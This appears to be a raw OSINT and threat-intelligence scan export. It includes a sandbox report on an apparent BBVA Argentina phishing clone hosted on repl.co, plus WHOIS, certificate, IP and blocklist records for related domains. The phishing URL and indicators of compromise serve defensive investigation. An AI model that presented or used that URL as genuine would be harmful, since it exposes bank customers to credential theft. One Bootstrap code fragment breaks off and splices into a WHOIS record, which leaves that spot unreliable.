[%APPDATA%\\Microsoft\\Windows\\Cookies\\H4T1U159.txt]- [targetUID: 00000000-00003028]\n Dropped file: "NA01GQNY.txt" - Location: 
[%APPDATA%\\Microsoft\\Windows\\Cookies\\NA01GQNY.txt]- [targetUID: 00000000-00004024]\n Dropped file: "8FUQ10PO.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8FUQ10PO.txt]- [targetUID: 00000000-00003028]\n Dropped file: "SBLNSM9V.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SBLNSM9V.txt]- [targetUID: 00000000-00004024]\n Dropped file: "8VQ1VJED.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8VQ1VJED.txt]- [targetUID: 00000000-00003028]\n Dropped file: "G2TB019O.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\G2TB019O.txt]- [targetUID: 00000000-00003028]\n Dropped file: "KGNCU8EK.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\KGNCU8EK.txt]- [targetUID: 00000000-00003028]\n Dropped file: "525F4STS.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\525F4STS.txt]- [targetUID: 00000000-00004024]\n Dropped file: "1EVI5CBM.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1EVI5CBM.txt]- [targetUID: 00000000-00003028]\n Dropped file: "T4BI7YRG.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\T4BI7YRG.txt]- [targetUID: 00000000-00003028]\n Dropped file: "6Q25NQIL.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6Q25NQIL.txt]- [targetUID: 00000000-00003028]\n Dropped file: "L2LWFGYF.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\L2LWFGYF.txt]- [targetUID: 00000000-00003028]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "CabC0B9.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', 
u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"cash_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "logo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "profile_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "poper.min_1_.js" has type "ASCII text with CRLF line terminators"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00004024]\n "large.lc-20220223-181547-lc.min.ACSHASH8f81358eebb18a1778ddd3319a401956_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003028]\n "icons_1_.css" has type "ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "~DFBAA192D55BF21B63.TMP" has type "data"- Location: [%TEMP%\\~DFBAA192D55BF21B63.TMP]- [targetUID: 00000000-00004024]\n "W05YX9G3.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\W05YX9G3.txt]- [targetUID: 00000000-00003028]\n "_54E98CF3-48C6-11ED-9793-080027B7866D_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "H4T1U159.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\H4T1U159.txt]- [targetUID: 00000000-00003028]\n "TarC0BA.tmp" has type "data"- Location: [%TEMP%\\TarC0BA.tmp]- [targetUID: 00000000-00003028]\n 
"B398B80134F72209547439DB21AB308D_9487BC0D4381A7CDEB9A8CC43F66D27C" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\B398B80134F72209547439DB21AB308D_9487BC0D4381A7CDEB9A8CC43F66D27C]- [targetUID: 00000000-00003028]\n "fix_1_.css" has type "ASCII text with CRLF line terminators"- [targetUID: N/A]\n "bbvaweb-book-woff_1_.woff" has type "Web Open Font Format TrueType length 68827 version 1.0"- [targetUID: N/A]\n "F4RUS99S.htm" has type "HTML document UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\F4RUS99S.htm]- [targetUID: 00000000-00003028]\n "NA01GQNY.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NA01GQNY.txt]- [targetUID: 00000000-00004024]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://frances.hombanking.repl.co/"\n Pattern match: "https://frances.hombanking.repl.co"\n Heuristic match: "bbva.com.ar"\n Heuristic match: "frances.hombanking.repl.co"\n Pattern match: "https://bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.alert/small.lc-20220223-181547-lc.min.ACSHASH188b9a681452e17cd885be8f4ee86173.css"\n Pattern match: "https://schema.org/SiteNavigationElement"\n Pattern match: "https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"\n Pattern match: "m.ar/apps/bbva/pwebs/components/clientlibs/bbva.access/small.lc-20220223-181547-lc.min.css"\n Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "https://www.bbva.com.ar/fnetcore/assets/img/public/bg-blueCore.svg"\n Pattern match: "https://www.bbva.com.ar/fnetcore/assets/img/left-arrow.png"\n Pattern match: 
"https://www.bbva.com.ar/fnetcore/assets/img/arrow_right.png"\n Pattern match: "https://www.bbva.com.ar/fnetcore/assets/fonts/bbva-book/bbvaweb-book-eot.eot"\n Pattern match: "https://www.bbva.com.ar/fnetcore/assets/fonts/coronita/BentonSansBBVA-Bold.svg"\n Pattern match: "https://www.bbva.com.ar/fnetcore/assets/fonts/bbva-icons-login/fonts/bbva-icons-login.svg#bbva-icons-login"\n Pattern match: "https://www.bbva.com.ar/fnetcore/assets/fonts/bbva-bsas/fonts/bbva-icons.ttf"\n Pattern match: "https://popper.js.org/"\n Pattern match: "http://dev.jquery.com/ticket/2752"\n Pattern match: "https://github.com/malsup/form/commit/588306aedba1de01388032d5f42a60159eea9228#commitcomment-2180219"\n Pattern match: "http://groups.google.com/group/jquery-dev/browse_thread/thread/36395b7ab510dd5d"\n Pattern match: "http://en.wikipedia.org/wiki/Same_origin_policy"\n Pattern match: "http://docs.jquery.com/Tutorials:Introducing_$(document). 34.149.204.188
2022-12-18 00:04:00 Physical Location No ipstack 0 0 1 0 None Netherlands 40.113.112.131
2022-12-18 00:10:20 Vulnerability - CVE Medium Yes Tool - testssl.sh 0 1 2 0 None CVE-2016-6329 https://nvd.nist.gov/vuln/detail/CVE-2016-6329 Score: 4.3 Description: OpenVPN, when using a 64-bit block cipher, makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTP-over-OpenVPN session using Blowfish in CBC mode, aka a "Sweet32" attack. 188.114.97.0
2022-12-18 00:07:18 Web Content Type No Web Spider 0 0 3 0 None text/html; charset=utf-8 http://misogyny.wtf/parser
2022-12-18 00:13:26 Affiliate - Email Address No E-Mail Address Extractor 0 0 2 0 None abuse@enom.com Domain Name: PLAGUE.FUN Registry Domain ID: D268611982-CNIC Registrar WHOIS Server: whois.enom.com Registrar URL: https://www.enom.com/ Updated Date: 2022-12-05T18:48:20.0Z Creation Date: 2022-01-08T12:59:17.0Z Registry Expiry Date: 2023-01-08T23:59:59.0Z Registrar: eNom, Inc. 
Registrar IANA ID: 48 Domain Status: serverHold https://icann.org/epp#serverHold Registrant Organization: Data Protected Registrant State/Province: WA Registrant Country: US Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: GARRETT.NS.CLOUDFLARE.COM Name Server: JOURNEY.NS.CLOUDFLARE.COM DNSSEC: unsigned Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registrar Abuse Contact Email: domainabuse@tucows.com Registrar Abuse Contact Phone: +49.2283296859 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:49.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. 
Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. Domain Name: plague.fun Registry Domain ID: D268611982-CNIC Registrar WHOIS Server: WHOIS.ENOM.COM Registrar URL: WWW.ENOM.COM Updated Date: 2022-12-05T18:48:20.00Z Creation Date: 2022-01-08T12:59:00.00Z Registrar Registration Expiration Date: 2023-01-08T23:59:59.00Z Registrar: ENOM, INC. Registrar IANA ID: 48 Domain Status: serverHold https://www.icann.org/epp#serverHold Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Alpes-Maritimes Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: FR Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: REDACTED FOR PRIVACY Registrant Email: https://tieredaccess.com/contact/177ad87c-41f0-4b87-926f-459f450a86e9 Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: REDACTED FOR PRIVACY Admin Email: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: REDACTED FOR PRIVACY Tech Email: REDACTED FOR PRIVACY Name Server: GARRETT.NS.CLOUDFLARE.COM Name 
Server: JOURNEY.NS.CLOUDFLARE.COM DNSSEC: unsigned Registrar Abuse Contact Email: ABUSE@ENOM.COM Registrar Abuse Contact Phone: +1.4259744689 URL of the ICANN WHOIS Data Problem Reporting System: HTTPS://ICANN.ORG/WICF >>> Last update of WHOIS database: 2022-12-18T00:02:49.00Z <<< For more information on Whois status codes, please visit https://icann.org/epp The data in this whois database is provided to you for information purposes only, that is, to assist you in obtaining information about or related to a domain name registration record. We make this information available "as is," and do not guarantee its accuracy. By submitting a whois query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (1) enable high volume, automated, electronic processes that stress or load this whois database system providing you this information; or (2) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone. The compilation, repackaging, dissemination or other use of this data is expressly prohibited without prior written consent from us. We reserve the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. 
Version 6.3 4/3/2002
2022-12-18 00:24:06 Affiliate - Email Address No E-Mail Address Extractor 0 0 5 0 None private@register.it Domain Name: SETUPDNS.NET Registry Domain ID: 1581585796_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.register.it Registrar URL: http://www.register.it Updated Date: 2022-01-13T08:14:30Z Creation Date: 2010-01-12T13:36:45Z Registry Expiry Date: 2023-01-12T13:36:45Z Registrar: Register SPA Registrar IANA ID: 168 Registrar Abuse Contact Email: abuse@register.it Registrar Abuse Contact Phone: +39.05520021555 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Name Server: NS1.REGISTER.IT Name Server: NS2.REGISTER.IT DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:22:01Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. 
VeriSign does not guarantee its accuracy. By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain Name: SETUPDNS.NET Registry Domain ID: 1581585796_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.register.it Registrar URL: http://we.register.it Updated Date: 2022-02-14T00:00:00Z Creation Date: 2010-01-12T00:00:00Z Registrar Registration Expiration Date: 2023-01-12T00:00:00Z Registrar: REGISTER S.P.A. 
Registrar IANA ID: 168 Registrar Abuse Contact Email: abuse@register.it Registrar Abuse Contact Phone: +39.05520021555 Reseller: Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Registry Registrant ID: Registrant Name: Global Domain Privacy Registrant Organization: GLOBAL DOMAIN PRIVACY Registrant Street: Via Zanchi 22 Registrant City: Bergamo Registrant State/Province: BG Registrant Postal Code: 24126 Registrant Country: IT Registrant Phone: +39.353230400 Registrant Phone Ext: Registrant Fax: +39.353230312 Registrant Fax Ext: Registrant Email: z22lglbqy5igu1vav@registerprivateregistration.com Registry Admin ID: Admin Name: Global Domain Privacy Admin Organization: GLOBAL DOMAIN PRIVACY Admin Street: Via Zanchi 22 Admin City: Bergamo Admin State/Province: BG Admin Postal Code: 24126 Admin Country: IT Admin Phone: +39.353230400 Admin Phone Ext: Admin Fax: +39.353230312 Admin Fax Ext: Admin Email: z22lglbqy5igu1vav@registerprivateregistration.com Registry Tech ID: Tech Name: Global Domain Privacy Tech Organization: GLOBAL DOMAIN PRIVACY Tech Street: Via Zanchi 22 Tech City: Bergamo Tech State/Province: BG Tech Postal Code: 24126 Tech Country: IT Tech Phone: +39.353230400 Tech Phone Ext: Tech Fax: +39.353230312 Tech Fax Ext: Tech Email: private@register.it Name Server: NS1.REGISTER.IT Name Server: NS2.REGISTER.IT DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of whois database: 2022-12-18T00:22:21Z <<< For more information on Whois status codes, please visit https://icann.org/epp
2022-12-18 00:04:35 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None {u'count': 2, u'search_terms': [{u'id': u'host', u'value': u'172.67.147.230'}], u'result': [{u'environment_id': 160, u'job_id': 
u'638b79ab6f23a45cc67a044e', u'analysis_start_time': u'2022-12-03 16:30:36', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 52, u'verdict': u'no verdict', u'submit_name': u'Pivigames.blog - Descarga JUEGOS GRATIS.url', u'sha256': u'd51ff0bf54967d6a468d148b1c29154b6e1971c6afb0d634b1cf4c9ea12fcbc8', u'type': None, u'type_short': u'file link', u'size': 211}, {u'environment_id': 120, u'job_id': u'617ee60fb53c2c10d819a570', u'analysis_start_time': u'2021-10-31 18:53:09', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 64 bit', u'threat_score': 64, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'a5b741295cd0f45f98a8381a32ff29f7dcf0cda8642b8fd26763a2e54ce299d6', u'type': None, u'type_short': u'url', u'size': 61}]} 172.67.147.230
2022-12-18 00:16:27 SSL Certificate - Issued to No SSL Certificate Analyzer 1 0 2 0 None C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com 188.114.97.3
2022-12-18 00:18:03 Web Technology No Tool - WhatWeb 0 0 2 0 None HTML5 webmail.zerotwo-best-waifu.online
2022-12-18 00:19:03 Raw Data from RIRs No ipapi.co 0 0 3 0 None {u'region_code': u'52', u'country_tld': u'.it', u'ip': u'195.110.124.246', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 60431283, u'country_code': u'IT', u'timezone': u'Europe/Rome', u'city': u'Florence', u'network': u'195.110.124.0/24', u'languages': u'it-IT,de-IT,fr-IT,sc,ca,co,sl', u'version': u'IPv4', u'latitude': 43.7891, u'in_eu': True, u'utc_offset': u'+0100', u'continent_code': u'EU', u'country_name': u'Italy', u'country_capital': u'Rome', u'org': u'Register S.p.A.', u'postal': u'50135', u'asn': u'AS39729', u'country': u'IT', u'region': u'Tuscany', u'longitude': 11.2356, u'country_calling_code': u'+39', u'country_area': 301230.0, u'country_code_iso3': u'ITA'} 195.110.124.246
2022-12-18 00:06:35 Open TCP Port No Pulsedive 0 0 2 0 None 188.114.97.0:80 
188.114.97.0
2022-12-18 00:12:58 Malicious IP on Same Subnet Yes blocklist.de 0 0 2 0 None blocklist.de List [40.112.0.0/13] http://lists.blocklist.de/lists/all.txt 40.112.0.0/13
2022-12-18 00:28:20 Web Framework No Web Framework Identifier 0 0 5 0 None jQuery /*! * Bootstrap v3.4.1 (https://getbootstrap.com/) * Copyright 2011-2019 Twitter, Inc. * Licensed under the MIT license */ if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");!function(t){"use strict";var e=jQuery.fn.jquery.split(" ")[0].split(".");if(e[0]<2&&e[1]<9||1==e[0]&&9==e[1]&&e[2]<1||3this.$items.length-1||t<0))return this.sliding?this.$element.one("slid.bs.carousel",function(){e.to(t)}):i==t?this.pause().cycle():this.slide(i>> Last update of whois database: 2022-12-18T00:37:12Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. 
By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. 
Domain Name: prgmr.com Registry Domain ID: 70002607_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.joker.com Registrar URL: https://joker.com Updated Date: 2022-05-22T20:37:35Z Creation Date: 2001-04-27T00:09:53Z Registrar Registration Expiration Date: 2023-04-26T22:09:32Z Registrar: CSL Computer Service Langenbach GmbH d/b/a joker.com Registrar IANA ID: 113 Registrar Abuse Contact Email: abuse@joker.com Registrar Abuse Contact Phone: +49.21186767447 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registrant Organization: Prgmr.com, Inc Registrant State/Province: ca Registrant Country: US Registrant Email: https://csl-registrar.com/contact/prgmr.com/owner Admin Email: https://csl-registrar.com/contact/prgmr.com/admin Tech Email: https://csl-registrar.com/contact/prgmr.com/tech Name Server: ns.prgmr.com Name Server: ns2.prgmr.com Name Server: ns3.prgmr.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:37:18Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTE: By submitting a WHOIS query, you agree to abide by the following NOTE: terms of use: You agree that you may use this data only for lawful NOTE: purposes and that under no circumstances will you use this data to: NOTE: (1) allow, enable, or otherwise support the transmission of mass NOTE: unsolicited, commercial advertising or solicitations via direct mail, NOTE: e-mail, telephone, or facsimile; or (2) enable high volume, automated, NOTE: electronic processes that apply to Joker.com (or its computer systems). NOTE: The compilation, repackaging, dissemination or other use of this data NOTE: is expressly prohibited without the prior written consent of Joker.com. 
2022-12-18 00:20:56 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": [""]} 2606:4700:3031::ac43:93e6 2022-12-18 00:03:11 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 03:08:aa:47:53:40:59:b8:a3:96:dc:96:87:a9:7a:35:d6:08 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Sep 1 17:51:42 2022 GMT Not After : Nov 30 17:51:41 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:6b:d4:77:ba:7c:58:74:d4:f7:62:3e:a5:9e:fa: e4:b2:ad:38:11:67:f4:2c:6b:e2:4b:cf:d7:47:ec: bc:44:40:93:e0:b5:59:3b:36:a9:57:77:9f:e2:6e: a1:bf:09:57:5c:e1:38:9b:5d:d2:fd:8a:b1:b3:72: 69:72:d1:bd:91 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: EF:B8:30:CC:B8:73:D9:84:B0:36:57:51:D0:94:4A:9E:35:F7:78:1B X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 29:79:BE:F0:9E:39:39:21:F0:56:73:9F:63:A5:77:E5: BE:57:7D:9C:60:0A:F8:F9:4D:5D:26:5C:25:5D:C7:84 Timestamp : Sep 1 18:51:42.328 2022 
GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:EC:B7:61:12:A5:3D:86:54:42:E0:1C: 85:40:38:6B:1D:DC:BA:74:3E:FB:D2:C9:05:2E:1B:34: 1F:4B:CF:C0:3C:02:21:00:CA:A5:73:8D:BE:D8:2E:ED: AF:66:9E:0E:49:DB:37:FC:64:F6:67:8F:A2:C7:49:F5: B3:0D:EF:74:4C:89:26:D0 Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 41:C8:CA:B1:DF:22:46:4A:10:C6:A1:3A:09:42:87:5E: 4E:31:8B:1B:03:EB:EB:4B:C7:68:F0:90:62:96:06:F6 Timestamp : Sep 1 18:51:42.843 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:21:00:B2:88:F4:C8:20:58:BA:18:DF:D3:24: F9:B6:9D:A2:FC:37:E2:5E:FD:D6:C2:35:F0:CE:C0:20: 13:B5:BD:2D:71:02:20:5D:64:D2:39:18:69:DF:99:0F: 11:AA:B9:01:8A:83:D0:64:CE:C2:AC:37:88:44:B3:97: 19:6D:A7:47:66:1A:55 Signature Algorithm: ecdsa-with-SHA384 30:66:02:31:00:b4:96:26:f4:03:24:e4:bb:b5:82:aa:d3:c2: ec:b4:60:96:ff:57:69:98:07:04:6d:8a:c5:17:3b:fb:49:b6: ef:73:02:c4:ca:5c:ac:15:b2:01:f6:63:b3:d0:77:d1:f3:02: 31:00:99:35:fb:af:8e:bc:d9:93:22:b7:fb:68:cb:e4:95:19: 7b:22:15:d1:9b:48:d1:5a:7b:af:4c:0f:47:89:c3:60:70:13: 01:a0:8a:48:d6:54:db:a7:23:4a:87:4d:d3:db plague.fun 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None logitec-a53131 (Net ID: 00:01:8E:A5:31:30) 37.780462,-122.390564 2022-12-18 00:04:38 Raw Data from RIRs No Maltiverse 0 0 2 0 None {u'asn_registry': u'ripencc', u'country_code': u'US', u'classification': u'whitelist', u'asn_country_code': u'US', u'address': u'Viktualienmarkt Rosental 7 80331 Munchen, DE', u'creation_time': u'2022-01-24 08:21:16', u'asn_date': u'2012-09-07 00:00:00', u'tag': [u'phishing'], u'is_mining_pool': False, u'ip_addr': u'188.114.97.0', u'registrant_name': u'CloudFlare, Inc. 
101 Townsend Street, San Francisco, CA 94107, US +1 (650) 319-8930 https://cloudflare.com/', u'last_updated': u'2015-10-16 16:26:10', u'number_of_whitelisted_domains_resolving': 1, u'is_known_scanner': False, u'location': {u'lat': 37.751, u'lon': -97.822}, u'type': u'ip', u'is_cnc': False, u'is_iot_threat': False, u'is_known_attacker': False, u'blacklist': [{u'count': 1, u'description': u'Phishing', u'labels': [u'compromised'], u'source': u'Maltiverse', u'first_seen': u'2022-04-07 12:41:52', u'last_seen': u'2022-04-07 12:41:52'}, {u'count': 1, u'source': u'Maltiverse', u'first_seen': u'2022-01-20 17:14:00', u'description': u'Malware', u'last_seen': u'2022-01-20 17:14:00'}], u'modification_time': u'2022-04-07 12:41:52', u'asn_cidr': u'188.114.97.0/24', u'number_of_domains_resolving': 1, u'is_tor_node': False, u'is_open_proxy': False, u'cidr': [u'188.114.96.0/22'], u'number_of_blacklisted_domains_resolving': 0, u'is_distributing_malware': False, u'is_sinkhole': False, u'is_hosting': False, u'is_cdn': False, u'as_name': u'AS13335 CloudFlare', u'is_vpn_node': False} 188.114.97.0
2022-12-18 00:02:43 SSL Certificate - Issued by No CertSpotter 0 0 1 0 None C=US,O=Google Trust Services LLC,CN=GTS CA 1P5 plague.fun
2022-12-18 00:18:23 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.9:80 188.114.97.0/24
